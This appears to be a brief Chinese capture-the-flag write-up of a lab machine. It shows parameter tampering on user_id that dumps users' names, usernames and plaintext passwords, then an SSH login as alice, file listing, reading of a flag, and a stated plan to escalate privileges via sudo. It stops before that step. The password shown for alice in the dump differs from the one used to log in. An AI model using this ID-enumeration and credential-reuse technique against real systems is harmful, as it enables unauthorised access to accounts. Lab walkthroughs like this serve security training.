在url修改id=xx http://192.168.227.133/index.php?page=profile&user_id=1 Name Eweuh Tandingan Username eweuhtandingan Password skuyatuh Id=2 Name Aing Maung Username aingmaung Password qwerty!!! Id=3 Name Sunda Tea Username sundatea Password indONEsia Id=4 Name Sedih Aing Mah Username sedihaingmah Password cedihhihihi Id=5 Name Alice Geulis Username alice Password ic3 Id=6 Name Username Password Id=7 Name Username Password Id=8 Name Username Password Id=9 Name Abdi Kasep Username abdikasepak Password orrrrr Id=10 Name Username Password Id=11 Name Username Password Id=5 这个应该是ssh连接的账号和密码,根据靶场介绍我们应该要找一个叫做alice的用户 Ssh alice@192.168.227.133 密码 4lic3
ls -alh
ls -l .my_secret/
cat .my_secret/flag1.txt Flag 1 : gfriEND{2f5f21b2af1b8c3e227bcf35544f8f09} 那接下来就提权吧 查看一下当前用户的sudo能使用那些命令